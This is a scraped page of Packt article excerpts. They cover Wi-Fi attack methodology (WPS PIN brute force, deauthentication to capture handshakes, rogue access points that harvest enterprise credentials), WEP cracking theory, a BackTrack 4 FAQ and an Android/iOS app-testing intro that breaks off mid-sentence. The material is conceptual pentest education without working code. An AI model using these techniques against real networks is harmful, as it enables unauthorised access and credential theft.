but it turned out to be one of the biggest wholes in modern WLANs if activated. WPS works with WPA/WPA2-PSK and allows connecting devices to WLANs with one of the following methods: PIN: Entering a PIN on a device. A PIN is usually printed on a sticker at the back side of a Wi-Fi access point. Push button: Special buttons should be pushed on both an access point and a client device during the connection phase. Buttons on devices can be physical and virtual. NFC: A client should bring a device close to an access point to utilize the Near Field Communication technology. USB drive: Necessary connection information exchange between an access point and a device is done using a USB drive. Because WPS PINs are very short and their first and second parts are validated separately, online brute-force attack on a PIN can be done in several hours allowing an attacker to connect to a WLAN. Furthermore, the possibility of offline PIN cracking was found in 2014 which allows attackers to crack pins in 1 to 30 seconds, but it works only on certain devices. You should also not forget that a person who is not permitted to connect to a WLAN but who can physically access a Wi-Fi router or access point can also read and use a PIN or connect via push button method. Getting familiar with the Wi-Fi attack workflow In our opinion (and we hope you agree with us), planning and building a secure WLAN is not possible without the understanding of various attack methods and their workflow. In this topic, we will give you an overview of how attackers work when they are hacking WLANs. General Wi-Fi attack methodology After refreshing our knowledge about wireless threats and Wi-Fi security mechanisms, let's have a look at the attack methodology used by attackers in the real world. Of course, as with all other types of network attack, wireless attack workflows depend on certain situations and targets, but they still align with the following general sequence in almost all cases: The first step is planning. Normally, attackers need to plan what are they going to attack, how can they do it, which tools are necessary for the task, when is the best time and place to attack certain targets, and which configuration templates will be useful so that they can be prepared in advance. White-hat hackers or penetration testers need to set schedules and coordinate project plans with their customers, choose contact persons on a customer side, define project deliverables, and do some other organizational work if demanded. As with every penetration testing project, the better a project was planned (and we can use the word "project" for black-hat hackers' tasks), the more chances of a successful result. The next step is survey. Getting as accurate as possible and as much as possible information about a target is crucial for a successful hack, especially in uncommon network infrastructures. To hack a WLAN or its wireless clients, an attacker would normally collect at least SSIDs or MAC addresses of access points and clients and information about a security type in use. It is also very helpful for an attacker to understand if WPS is enabled on a target access point. All that data allows attackers not only to set proper configs and choose the right options for their tools, but also to choose appropriate attack types and conditions for a certain WLAN or Wi-Fi client. All collected information, especially non-technical (for example, company and department names, brands, or employee names), can also become useful at the cracking phase to build dictionaries for brute-force attacks. Depending on a type of security and attacker's luck, a data collected at the survey phase can even make the active attack phase unnecessary and allow an attacker to proceed directly with the cracking phase. The active attacks phase involves active interaction between an attacker and targets (WLANs and Wi-Fi clients). At this phase, attackers have to create conditions necessary for a chosen attack type and execute it. It includes sending various Wi-Fi management and control frames and installing rogue access points. If an attacker wants to cause a denial of service in a target WLAN as a goal, such attacks are also executed at this phase. Some of active attacks are essential to successfully hack a WLAN, but some of them are intended to just speed up hacking and can be omitted to avoid causing alarm on various wireless intrusion detection/prevention systems (wIDPS), which can possibly be installed in a target network. Thus, the active attacks phase can be called optional. Cracking is another important phase where an attacker cracks 4-way-hadshakes, WEP data, NTLM hashes, and so on, which were intercepted at the previous phases. There are plenty of various free and commercial tools and services including cloud cracking services. In case of success at this phase, an attacker gets the target WLAN's secret(s) and can proceed with connecting to the WLAN, decrypt intercepted traffic, and so on. The active attacking phase Let's have a closer look to the most interesting parts of the active attack phase—WPA-PSK and WPA-Enterprise attacks—in the following topics. WPA-PSK attacks As both WPA and WPA2 are based on the 4-way handshake, attacking them doesn't differ—an attacker needs to sniff a 4-way handshake in the moment, establishing a connection between an access point and an arbitrary wireless client and bruteforcing a matching PSK. It does not matter whose handshake is intercepted, because all clients use the same PSK for a given target WLAN. Sometimes, attackers have to wait long until a device connects to a WLAN to intercept a 4-way handshake and of course they would like to speed up the process when possible. For that purpose, they force already connected device to disconnect from an access point sending control frames (deauthentication attack) on behalf of a target access point. When a device receives such a frame, it disconnects from a WLAN and tries to reconnect again if the "automatic reconnect" feature is enabled (it is enabled by default on most devices), thus performing another one 4-way handshake that can be intercepted by an attacker. Another possibility to hack a WPA-PSK protected network is to crack a WPS PIN if WPS is enabled on a target WLAN. Enterprise WLAN attacks Attacking becomes a little bit more complicated if WPA-Enterprise security is in place, but could be executed in several minutes by a properly prepared attacker by imitating a legitimate access point with a RADIUS server and by gathering user credentials for further analysis (cracking). To settle this attack, an attacker needs to install a rogue access point with a SSID identical to a target WLAN's SSID and set other parameter (like EAP type) similar to the target WLAN to increase chances on success and reduce the probability of the attack to be quickly detected. Most user Wi-Fi devices choose an access point for a connection to a certain WLAN by a signal strength—they connect to that one which has the strongest signal. That is why an attacker needs to use a powerful Wi-Fi interface for a rogue access point to override signals from legitimate ones and make devices around connect to the rogue access point. A RADIUS server used during such attacks should have a capability to record authentication data, NTLM hashes, for example. From a user perspective, being attacked in such way looks just being unable to connect to a WLAN for an unknown reason and could even be not seen if a user is not using a device at the moment and just passing by a rogue access point. It is worth mentioning that classic physical security or wireless IDPS solutions are not always effective in such cases. An attacker or a penetration tester can install a rogue access point outside of the range of a target WLAN. It will allow hacker to attack user devices without the need to get into a physically controlled area (for example, office building), thus making the rogue access point unreachable and invisible for wireless IDPS systems. Such a place could be a bus or train station, parking or a café where a lot of users of a target WLAN go with their Wi-Fi devices. Unlike WPA-PSK with only one key shared between all WLAN users, the Enterprise mode employs personified credentials for each user whose credentials could be more or less complex depending only on a certain user. That is why it is better to collect as many user credentials and hashes as possible thus increasing the chances of successful cracking. Summary In this article, we looked at the security mechanisms that are used to secure access to wireless networks, their typical threads, and common misconfigurations that lead to security breaches and allow attacker to harm corporate and private wireless networks. The brief attack methodology overview has given us a general understanding of how attackers normally act during wireless attacks and how they bypass common security mechanisms by abusing certain flaws in those mechanisms. We also saw that the most secure and preferable way to protect a wireless network is to use WPA2-Enterprise security along with a mutual client and server authentication, which we are going to implement in our penetration testing lab. Resources for Article: Further resources on this subject: Pentesting Using Python [article] Advanced Wireless Sniffing [article] Wireless and Mobile Hacks [article]
Read more
  • 0
  • 0
  • 9789

article-image-designing-secure-java-ee-applications-glassfish
Packt
31 May 2010
2 min read
Save for later

Designing Secure Java EE Applications in GlassFish

Packt
31 May 2010
2 min read
Security is an orthogonal concern for an application and we should assess it right from the start by reviewing the analysis we receive from business and functional analysts. Assessing the security requirements results in understanding the functionalities we need to include in our architecture to deliver a secure application covering the necessary requirements. Security necessities can include a wide area of requirements, which may vary from a simple authentication to several sub-systems. A list of these sub-systems includes identity and access management system and transport security, which can include encrypting data as well. In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In course of the article, we will cover the following topics: Analyzing Java EE application security requirements Including security requirements in Java EE application design Developing secure Business layer using EJBs Developing secure Presentation layer using JSP and Servlets Configuring deployment descriptors of Java EE applications Specifying security realm for enterprise applications Developing secure application client module Configuring Application Client Container Developing Secure Java EE Applications in GlassFish is the second part of this article series. Understanding the sample application The sample application that we are going to develop, converts different length measurement units into each other. Our application converts meter to centimeter, millimeter, and inch. The application also stores usage statistics for later use cases. Guest users who prefer not to log in can only use meter to centimeter conversion, while any company employee can use meter to centimeter and meter to millimeter conversion, and finally any of company's managers can access meter to inch in addition to two other conversion functionalities. We should show a custom login page to comply with site-wide look and feel. No encryption is required for communication between clients and our application but we need to make sure that no one can intercept and steal the username and passwords provided by members. All members' identification information is stored in the company's wide directory server. The following diagram shows the high-level functionality of the sample application: We have login action and three conversion actions. Users can access some of them after logging in and some of them can be accessed without logging in.
Read more
  • 0
  • 0
  • 9689
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-introduction-wep
Packt
10 Aug 2015
4 min read
Save for later

An Introduction to WEP

Packt
10 Aug 2015
4 min read
In this article by Marco Alamanni, author of the book, Kali Linux Wireless Penetration Testing Essentials, has explained that the WEP protocol was introduced with the original 802.11 standard as a means to provide authentication and encryption to wireless LAN implementations. It is based on the RC4 (Rivest Cipher 4) stream cypher with a preshared secret key (PSK) of 40 or 104 bits, depending on the implementation. A 24 bit pseudo-random Initialization Vector (IV) is concatenated with the preshared key to generate the per-packet keystream used by RC4 for the actual encryption and decryption processes. Thus, the resulting keystream could be 64 or 128 bits long. (For more resources related to this topic, see here.) In the encryption phase, the keystream is XORed with the plaintext data to obtain the encrypted data, while in the decryption phase the encrypted data is XORed with the keystream to obtain the plaintext data. The encryption process is shown in the following diagram: Attacks against WEP First of all, we must say that WEP is an insecure protocol and has been deprecated by the Wi-Fi Alliance. It suffers from various vulnerabilities related to the generation of the keystreams, to the use of IVs and to the length of the keys. The IV is used to add randomness to the keystream, trying to avoid the reuse of the same keystream to encrypt different packets. This purpose has not been accomplished in the design of WEP, because the IV is only 24 bits long (with 2^24 = 16,777,216 possible values) and it is transmitted in clear-text within each frame. Thus, after a certain period of time (depending on the network traffic) the same IV, and consequently the same keystream, will be reused, allowing the attacker to collect the relative cypher texts and perform statistical attacks to recover the plain texts and the key. The first well-known attack against WEP was the Fluhrer, Mantin and Shamir (FMS) attack, back in 2001. The FMS attack relies on the way WEP generates the keystreams and on the fact that it also uses weak IVs to generate weak keystreams, making possible for an attacker to collect a sufficient number of packets encrypted with these keystreams, analyze them, and recover the key. The number of IVs to be collected to complete the FMS attack is about 250,000 for 40-bit keys and 1,500,000 for 104-bit keys. The FMS attack has been enhanced by Korek, improving its performances. Andreas Klein found more correlations between the RC4 keystream and the key than the ones discovered by Fluhrer, Mantin, and Shamir, that can used to crack the WEP key. In 2007, Pyshkin, Tews, and Weinmann (PTW) extended Andreas Klein's research and improved the FMS attack, significantly reducing the number of IVs needed to successfully recover the WEP key. Indeed, the PTW attack does not rely on weak IVs like the FMS attack does and is very fast and effective. It is able to recover a 104-bit WEP key with a success probability of 50 percent using less than 40,000 frames and with a probability of 95 percent with 85,000 frames. The PTW attack is the default method used by Aircrack-ng to crack WEP keys. Both the FMS and PTW attacks need to collect quite a large number of frames to succeed and can be conducted passively, sniffing the wireless traffic on the same channel of the target AP and capturing frames. The problem is that, in normal conditions, we will have to spend quite a long time to passively collect all the necessary packets for the attacks, especially with the FMS attack. To accelerate the process, the idea is to re-inject frames in the network to generate traffic in response so that we could collect the necessary IVs more quickly. A type of frame that is suitable for this purpose is the ARP request, because the AP broadcasts it and each time with a new IV. As we are not associated with the AP, if we send frames to it directly, they are discarded and a de-authentication frame is sent. Instead, we can capture ARP requests from associated clients and retransmit them to the AP. This technique is called the ARP Request Replay attack and is also adopted by Aircrack-ng for the implementation of the PTW attack. Summary In this article, we covered the WEP protocol, the attacks that have been developed to crack the keys. Resources for Article: Further resources on this subject: Kali Linux – Wireless Attacks [article] What is Kali Linux [article] Penetration Testing [article]
Read more
  • 0
  • 0
  • 9674

article-image-faqs-backtrack-4
Packt
26 May 2011
8 min read
Save for later

FAQs on BackTrack 4

Packt
26 May 2011
8 min read
BackTrack 4: Assuring Security by Penetration Testing Master the art of penetration testing with BackTrack         Q: Which version of Backtrack is to be chosen? A: On the BackTrack website (http://www.backtrack-linux.org/downloads/) or using third-party mirrors like http://mirrors.rit.edu/backtrack/ OR ftp://mirror.switch.ch/mirror/backtrack/), you will find two different formats of BackTrack version 4 (recently BackTrack 5 is out and hence you may not find version 4 on the official site but the mirror sites like http://mirrors.rit.edu/backtrack/ OR ftp://mirror.switch.ch/mirror/backtrack/ still provide it). One is formatted in ISO image file. You can use this file format if you want to burn it to a DVD, USB, Memory Cards (SSD, SDHC, SDXC, etc) or want to install BackTrack directly to your machine. The second file format is VMWare image. If you want to use BackTrack in a virtual environment, you might want to use this image to speed up the installation and configuration.   Q: What is Portable BackTrack? A: You can also install BackTrack to a USB flash disk, we call this method Portable BackTrack. After you install it to the USB flash disk, you can easily boot up into BackTrack from any machine provided with USB port. The key advantage of this method compared to the Live DVD is that you can permanently save changes to the USB flash disk. When compared to the hard disk installation, this method is more portable and convenient. To create a portable BackTrack, you can use several tools including UNetbootin (http://unetbootin.sourceforge.net), LinuxLive USB Creator (http://www.linuxliveusb.com) and LiveUSB MultiBoot (http://liveusb.info/dotclear/). These tools are available for Windows, Linux/UNIX, and Mac operating system.   Q: How to install BackTrack in a dual-boot environment? A: One of the resources that describe how to install BackTrack with other operating systems such as Windows XP can be found at: http://www.backtrack-linux.org/tutorials/dual-boot-install/.   Q: What types of penetration testing tools are available under Backtrack 4? A: BackTrack 4 comes with number of security tools that can be used during the penetration testing process. These are categorized into the following: Information gathering: This category contains tools that can be used to collect information regarding target DNS, routing, e-mail addresses, websites, mail servers, and so on. This information is usually gathered from the publicly available resources such as Internet, without touching the target environment. Network mapping: This category contains tools that can be used to assess the live status of the target host, fingerprint the operating system and, probe and map the applications/services through various port scanning techniques. Vulnerability identification: In this category you will find different set of tools to scan for vulnerabilities in various IT technologies. It also contains tools to carry out manual and automated fuzzy testing and analyzing SMB and SNMP protocols. Web application analysis: This category contains tools that can be used to assess the security of web servers and web applications. Radio network analysis: To audit wireless networks, Bluetooth and radio-frequency identification (RFID) technologies, you can use the tools in this category. Penetration: This category contains tools that can be used to exploit the vulnerabilities found in the target environment. Privilege escalation: After exploiting the vulnerabilities and gaining access to the target system, you can use the tools in this category to escalate your privileges to the highest level. Maintaining access: Tools in this category will be able to help you in maintaining access to the target machine. Note that, you might need to escalate your privileges before attempting to install any of these tools on the compromised host. Voice over IP (VOIP): In order to analyze the security of VOIP technology you can utilize the tools in this category. BackTrack 4 also contains tools that can be used for: Digital forensics: In this category you can find several tools that can be used to perform digital forensics and investigation, such as acquiring hard disk image, carving files, and analyzing disk archive. Some practical forensic procedures require you to mount the hard drive in question and swap the files in read-only mode to preserve evidence integrity. Reverse engineering: This category contains tools that can be used to debug, decompile and disassemble the executable file.   Q: Do I have to install additional tools with BackTrack 4? A: Although BackTrack 4 comes preloaded with so many security tools, however there are situations where you may need to add additional tools or packages because: It is not included with the default BackTrack 4 installation. You want to have the latest version of a particular tool which is not available in the repository. Our first suggestion is to try search the package in the software repository. If you find the package in the repository, please use that package, but if you can't find it, then you can get the software package from the author's website and install it by yourself. However, the prior method is highly recommended to avoid any installation and configuration conflicts. You can search for tools in the BackTrack repository using the apt-cache search command. However, if you can't find the package in the repository and you are sure that the package will not cause any problems later on, you can install the package by yourself.   Q: Why do we use the WebSecurify tool? A: WebSecurify is a web security testing environment that can be used to find vulnerabilities in the web applications. It can be used to check for the following vulnerabilities: SQL injection Local and remote file include Cross-site scripting Cross-site request forgery Information disclosure Session security flaws WebSecurify is readily available from the BackTrack repository. To install it you can use the apt-get command: # apt-get install websecurify You can search for tools in the BackTrack repository using the apt-cache search command.   Q: What are the types of penetration testing? A: Black-box testing: The black-box approach is also known as external testing. While applying this approach, the security auditor will be assessing the network infrastructure from a remote location and will not be aware of any internal technologies deployed by the concerning organization. By employing the number of real world hacker techniques and following through organized test phases, it may reveal some known and unknown set of vulnerabilities which may otherwise exist on the network. White-box testing: The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for an auditor to view and critically evaluate the security vulnerabilities with minimum possible efforts. Grey-Box testing: The combination of both types of penetration testing provides a powerful insight for internal and external security viewpoints. This combination is known as Grey-Box testing. The key benefit in devising and practicing a gray-box approach is a set of advantages posed by both approaches mentioned earlier.   Q: What is the difference between vulnerability assessment and penetration testing? A: A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws to the system under consideration. Another major difference between both of these terms is that the penetration testing is considerably more intrusive than vulnerability assessment and aggressively applies all the technical methods to exploit the live production environment. However, the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner. Penetration testing is an expensive service when compared to vulnerability assessment   Q: Which class of vulnerability is considered to be the worst to resolve? A: "Design vulnerability" takes a developer to derive the specifications based on the security requirements and address its implementation securely. Thus, it takes more time and effort to resolve the issue when compared to other classes of vulnerability.   Q: Which OSSTMM test type follows the rules of Penetration Testing? A: Double blind testing   Q: What is an Application Layer? A: Layer-7 of the Open Systems Interconnection (OSI) model is known as the “Application Layer”. The key function of this model is to provide a standardized way of communication across heterogeneous networks. A model is divided into seven logical layers, namely, Physical, Data link, Network, Transport, Session, Presentation, and Application. The basic functionality of the application layer is to provide network services to user applications. More information on this can be obtained from: http://en.wikipedia.org/wiki/OSI_model.   Q: What are the steps for BackTrack testing methodology? A: The illustration below shows the BackTrack testing process. Summary In this article we took a look at some of the frequently asked questions on BackTrack 4 so that we can use it more efficiently Further resources on this subject: Tips and Tricks on BackTrack 4 [Article] BackTrack 4: Target Scoping [Article] BackTrack 4: Security with Penetration Testing Methodology [Article] Blocking Common Attacks using ModSecurity 2.5 [Article] Telecommunications and Network Security Concepts for CISSP Exam [Article] Preventing SQL Injection Attacks on your Joomla Websites [Article]
Read more
  • 0
  • 0
  • 8987

article-image-android-and-ios-apps-testing-glance
Packt
02 Feb 2016
21 min read
Save for later

Android and iOS Apps Testing at a Glance

Packt
02 Feb 2016
21 min read
In this article by Vijay Velu, the author of Mobile Application Penetration Testing, we will discuss the current state of mobile application security and the approach to testing for vulnerabilities in mobile devices. We will see the major players in the smartphone OS market and how attackers target users through apps. We will deep-dive into the architecture of Android and iOS to understand the platforms and its current security state, focusing specifically on the various vulnerabilities that affect apps. We will have a look at the Open Web Application Security Project (OWASP) standard to classify these vulnerabilities. The readers will also get an opportunity to practice the security testing of these vulnerabilities via the means of readily available vulnerable mobile applications. The article will have a look at the step-by-step setup of the environment that's required to carry out security testing of mobile applications for Android and iOS. We will also explore the threats that may arise due to potential vulnerabilities and learn how to classify them according to their risks. (For more resources related to this topic, see here.) Smartphones' market share Understanding smartphones' market share will give us a clear picture about what cyber criminals are after and also what could be potentially targeted. The mobile application developers can propose and publish their applications on the stores and be rewarded by a revenue share of the selling price. The following screenshot that was taken from www.idc.com provides us with the overall smartphone OS market in 2015: Since mobile applications are platform-specific, majority of the software vendors are forced to develop applications for all the available operating systems. Android operating system Android is an open source, Linux-based operating system for mobile devices (smartphones and tablet computers). It was developed by the Open Handset Alliance, which was led by Google and other companies. Android OS is Linux-based. It can be programmed in C/C++, but most of the application development is done in Java (Java accesses C libraries via JNI, which is short for Java Native Interface). iPhone operating system (iOS) It was developed by Apple Inc. It was originally released in 2007 for iPhone, iPod Touch, and Apple TV. Apple's mobile version of the OS X operating system that's used in Apple computers is iOS. Berkeley Software Distribution (BSD) is UNIX-based and can be programmed in Objective C. Public Android and iOS vulnerabilities Before we proceed with different types of vulnerabilities on Android and iOS, this section introduces you to Android and iOS as an operating system and covers various fundamental concepts that need to be understood to gain experience in mobile application security. The following table comprises year-wise operating system releases: Year Android iOS 2007/2008 1.0 iPhone OS 1 iPhone OS 2 2009 1.1 iPhone OS 3 1.5 (Cupcake) 2.0 (Eclair) 2.0.1(Eclair) 2010 2.1 (Eclair) iOS 4 2.2 (Froyo) 2.3-2.3.2(Gingerbread) 2011 2.3.4-2.3.7 (Gingerbread) iOS 5 3.0 (HoneyComb) 3.1 (HoneyComb) 3.2 (HoneyComb) 4.0-4.0.2 (Ice Cream Sandwich) 4.0.3-4.0.4 (Ice Cream Sandwich) 2012 4.1 (Jelly Bean) iOS 6 4.2 (Jelly Bean) 2013 4.3 (Jelly bean) iOS 7 4.4 (KitKat) 2014 5.0 (Lollipop) iOS 8 5.1 (Lollipop) 2015   iOS 9 (beta) An interesting research conducted by Hewlett Packard (HP), a software giant that tested more than 2,000 mobile applications from more than 600 companies, has reported the following statistics (for more information, visit http://www8.hp.com/h20195/V2/GetPDF.aspx/4AA5-1057ENW.pdf): 97% of the applications that were tested access at least one private information source of these applications 86% of the applications failed to use simple binary-hardening protections against modern-day attacks 75% of the applications do not use proper encryption techniques when storing data on a mobile device 71% of the vulnerabilities resided on the web server 18% of the applications sent usernames and password over HTTP (of the remaining 85%, 18% implemented SSL/HTTPS incorrectly) So, the key vulnerabilities to mobile applications arise due to a lack of security awareness, "usability versus security trade-off" by developers, excessive application permissions, and a lack of privacy concerns. Coupling this with a lack of sufficient application documentation leads to vulnerabilities that developers are not aware of. Usability versus security trade-off For every developer, it would not be possible to provide users with an application with high security and usability. Making any application secure and usable takes a lot of effort and analytical thinking. Mobile application vulnerabilities are broadly categorized as follows: Insecure transmission of data: Either an application does not enforce any kind of encryption for data in transit on a transport layer, or the implemented encryption is insecure. Insecure data storage: Apps may store data either in a cleartext or obfuscated format, or hard-coded keys in the mobile device. An example e-mail exchange server configuration on Android device that uses an e-mail client stores the username and password in cleartext format, which is easy to reverse by any attacker if the device is rooted. Lack of binary protection: Apps do not enforce any anti-reversing, debugging techniques. Client-side vulnerabilities: Apps do not sanitize data provided from the client side, leading to multiple client-side injection attacks such as cross-site scripting, JavaScript injection, and so on. Hard-coded passwords/keys: Apps may be designed in such a way that hard-coded passwords or private keys are stored on the device storage. Leakage of private information: Apps may unintentionally leak private information. This could be due to the use of a particular framework and obscurity assumptions of developers. Android vulnerabilities In July 2015, a security company called Zimperium announced that it discovered a high-risk vulnerability named Stagefright inside the Android operating system. They deemed it as a unicorn in the world of Android risk, and it was practically demonstrated in one of the hacking conferences in the US on August 5, 2015. More information can be found at https://blog.zimperium.com/stagefright-vulnerability-details-stagefright-detector-tool-released/; a public exploit is available at https://www.exploit-db/exploits/38124/. This has made Google release security patches for all Android operating systems, which is believed to be 95% of the Android devices, which is an estimated 950 million users. The vulnerability is exploited through a particular library, which can let attackers take control of an Android device by sending a specifically crafted multimedia services like Multimedia Messaging Service (MMS). If we take a look at the superuser application downloads from the Play Store, there are around 1 million to 5 million downloads. It can be assumed that a major portion of Android smartphones are rooted. The following graphs show the Android vulnerabilities from 2009 until September 2015. There are currently 54 reported vulnerabilities for the Android Google operating system (for more information, visit http://www.cvedetails.com/product/19997/Google-Android.html?vendor_id=1224). More features that are introduced to the operating system in the form of applications act as additional entry points that allow cyber attackers or security researchers to circumvent and bypass the controls that were put in place. iOS vulnerabilities On June 18, 2015, password stealing vulnerability, also known as Cross Application Reference Attack (XARA), was outlined for iOS and OS X. It cracked the keychain services on jailbroken and non-jailbroken devices. The vulnerability is similar to cross-site request forgery attack in web applications. In spite of Apple's isolation protection and its App Store's security vetting, it was possible to circumvent the security controls mechanism. It clearly provided the need to protect the cross-app mechanism between the operating system and the app developer. Apple rolled a security update week after the XARA research. More information can be found at http://www.theregister.co.uk/2015/06/17/apple_hosed_boffins_drop_0day_mac_ios_research_blitzkrieg/ The following graphs show the vulnerabilities in iOS from 2007 until September 2015. There are around 605 reported vulnerabilities for Apple iPhone OS (for more information, visit http://www.cvedetails.com/product/15556/Apple-Iphone-Os.html?vendor_id=49). As you can see, the vulnerabilities kept on increasing year after year. A majority of the vulnerabilities reported are denial-of-service attacks. This vulnerability makes the application unresponsive. Primarily, the vulnerabilities arise due to insecure libraries or overwriting with plenty of buffer in the stacks. Rooting/jailbreaking Rooting/jailbreaking refers to the process of removing the limitations imposed by the operating system on devices through the use of exploit tools. Rooting/jailbreaking enables users to gain complete control over the operating system of a device. OWASP's top ten mobile risks In 2013, OWASP polled the industry for new vulnerability statistics in the field of mobile applications. The following risks were finalized in 2014 as the top ten dangerous risks as per the result of the poll data and mobile application threat landscape: M1: Weak server-side controls: Internet usage via mobiles has surpassed fixed Internet access. This is largely due to the emergence of hybrid and HTML5 mobile applications. Application servers that form the backbone of these applications must be secured on their own. The OWASP top 10 web application project defines the most prevalent vulnerabilities in this realm. Vulnerabilities such as injections, insecure direct object reference, insecure communication, and so on may lead to the complete compromise of an application server. Adversaries who have gained control over the compromised servers can push malicious content to all the application users and compromise user devices as well. M2: Insecure data storage: Mobile applications are being used for all kinds of tasks such as playing games, fitness monitors, online banking, stock trading, and so on, and most of the data used by these applications are either stored in the device itself inside SQLite files, XML data stores, log files, and so on, or they are pushed on to Cloud storage. The types of sensitive data stored by these applications may range from location information to bank account details. The application programing interfaces (API) that handle the storage of this data must securely implement encryption/hashing techniques so that an adversary with direct access to these data stores via theft or malware will not be able to decipher the sensitive information that's stored in them. M3: Insufficient transport layer protection: "Insecure Data Storage", as the name says, is about the protection of data in storage. But as all the hybrid and HTML 5 apps work on client-server architecture, emphasis on data in motion is a must, as the data will have to traverse through various channels and will be susceptible to eavesdropping and tampering by adversaries. Controls such as SSL/TLS, which enforce confidentiality and integrity of data, must be verified for correct implementations on the communication channel from the mobile application and its server. M4: Unintended data leakage: Certain functionalities of mobile applications may place users' sensitive data in locations where it can be accessed by other applications or even by malware. These functionalities may be there in order to enhance the usability or user experience but may pose adverse effects in the long run. Actions such as OS data caching, key press logging, copy/paste buffer caching, and implementations of web beacons or analytics cookies for advertisement delivery can be misused by adversaries to gain information about users. M5: Poor authorization and authentication: As mobile devices are the most "personal" devices, developers utilize this to store important data such as credentials locally in the device itself and come up with specific mechanisms to authenticate and authorize users locally for the services that users request via the application. If these mechanisms are poorly developed, adversaries may circumvent these controls and unauthorized actions can be performed. As the code is available to adversaries, they can perform binary attacks and recompile the code to directly access authorized content. M6: Broken cryptography: This is related to the weak controls that are used to protect data. Using weak cryptographic algorithms such as RC2, MD5, and so on, which can be cracked by adversaries, will lead to encryption failure. Improper encryption key management when a key is stored in locations accessible to other applications or the use of a predictable key generation technique will also break the implemented cryptography techniques. M7: Client-side injection: Injection vulnerabilities are the most common web vulnerabilities according to OWASP web top 10 dangerous risks. These are due to malformed inputs, which cause unintended action such as an alteration of database queries, command execution, and so on. In case of mobile applications, malformed inputs can be a serious threat at the local application level and server side as well (refer to M1: Weak server-side controls). Injections at a local application level, which mainly target data stores, may result in conditions such as access to paid content that's locked for trial users or file inclusions that may lead to an abuse of functionalities such as SMSes. M8: Security decisions via untrusted inputs: An implementation of certain functionalities such as the use of hidden variables to check authorization status can be bypassed by tampering them during the transit via web service calls or inter-process communication calls. This may lead to privilege escalations and unintended behavior of mobile applications. M9: Improper session handling: The application server sends back a session token on successful authentication with the mobile application. These session tokens are used by the mobile application to request for services. If these session tokens remain active for a longer duration and adversaries obtain them via malware or theft, the user account can be hijacked. M10: Lack of binary protection: A mobile application's source code is available to all. An attacker can reverse engineer the application and insert malicious code components and recompile them. If these tampered applications are installed by a user, they will be susceptible to data theft and may be the victims of unintended actions. Most applications do not ship with mechanisms such as checksum controls, which help in deducing whether the application is tampered or not. In 2015, there was another poll under the OWASP Mobile security group named the "umbrella project". This leads us to have M10 to M2, the trends look at binary protection to take over weak server-side controls. However, we will have wait until the final list for 2015. More details can be found at https://www.owasp.org/images/9/96/OWASP_Mobile_Top_Ten_2015_-_Final_Synthesis.pdf. Vulnerable applications to practice The open source community has been proactively designing plenty of mobile applications that can be utilized for practical tests. These are specifically designed to understand the OWASP top ten risks. Some of these applications are as follows: iMAS: iMAS is a collaborative research project initiated by the MITRE corporation (http://www.mitre.org/). This is for application developers and security researchers who would like to learn more about attack and defense techniques in iOS. More information about iMAS can be found at https://github.com/project-imas/about. GoatDroid: A simple functional mobile banking application for training with location tracking developed by Jack and Ken for Android application security is a great starting point for beginners. More information about GoatDroid can be found at https://github.com/jackMannino/OWASP-GoatDroid-Project. iGoat: The OWASP's iGOAT project is similar to the WebGoat web application framework. It's designed to improve the iOS assessment techniques for developers. More information on iGoat can be found at https://code.google.com/p/owasp-igoat/. Damn Vulnerable iOS Application (DVIA): DVIA is an iOS application that provides a platform for developers, testers, and security researchers to test their penetration testing skills. This application covers all the OWASP's top 10 mobile risks and also contains several challenges that one can solve and come up with custom solutions. More information on the Damn Vulnerable iOS Application can be found at http://damnvulnerableiosapp.com/. MobiSec: MobiSec is a live environment for the penetration testing of mobile environments. This framework provides devices, applications, and supporting infrastructure. It provides a great exercise for testers to view vulnerabilities from different points of view. More information on MobiSec can be found at http://sourceforge.net/p/mobisec/wiki/Home/. Android application sandboxing Android utilizes the well-established Linux protection ring model to isolate applications from each other. In Linux OS, assigning unique ID segregates every user. This ensures that there is no cross account data access. Similarly in Android OS, every app is assigned with its own unique ID and is run as a separate process. As a result, an application sandbox is formed at the kernel level, and the application will only be able to access the resources for which it is permitted to access. This subsequently ensures that the app does not breach its work boundaries and initiate any malicious activity. For example, the following screenshot provides an illustration of the sandbox mechanism: From the preceding Android Sandbox illustration, we can see how the unique Linux user ID created per application is validated every time a resource mapped to the app is accessed, thus ensuring a form of access control. Android Studio and SDK On May 16, 2013 at the Google I/O conference, an Integrated Development Environment (IDE) was released by Katherine Chou under Apache license 2.0; it was called Android Studio and it's used to develop apps on the Android platform. It entered the beta stage in 2014, and the first stable release was on December 2014 from Version 1.0 and it has been announced the official IDE on September 15, 2015. Information on Android Studio and SDK is available at http://developer.android.com/tools/studio/index.html#build-system. Android Studio and SDK heavily depends on the Java SE Development Kit. Java SE Development Kit can be downloaded at http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html. Some developers prefer different IDEs such as eclipse. For them, Google only offers SDK downloads (http://dl.google.com/android/installer_r24.4.1-windows.exe). There are minimum system requirements that need to be fulfilled in order to install and use the Android Studio effectively. The following procedure is used to install the Android Studio on Windows 7 Professional 64-bit Operating System with 4 GB RAM, 500 Gig Hard Disk Space, and Java Development Kit 7 installed: Install the IDE available for Linux, Windows, and Mac OS X. Android Studio can be downloaded by visiting http://developer.android.com/sdk/index.html. Once the Android Studio is downloaded, run the installer file. By default, an installation window will be shown, as shown in the following screenshot. Click on Next: This setup will automatically check whether the system meets the requirements. Choose all the components that are required and click on Next. It is recommended to read and accept the license and click on Next. It is always recommended to create a new folder to install the tools that will help us track all the evidence in a single place. In this case, we have created a folder called Hackbox in C:, as shown in the following screenshot: Now, we can allocate the space required for the Android-accelerated environment, which will provide better performance. So, it is recommended to allocate a minimum of 2GB for this space. All the necessary files will be extracted to C:Hackbox. Once the installation is complete, you will be able to launch Android Studio, as shown in the following screenshot: Android SDK Android SDK provides developers with the ability to completely build, test, and debug apps that run on the Android platform. It has all the relevant software libraries, APIs, system images of the emulators, documentations, and other tools that help create an Android app. We have installed Android 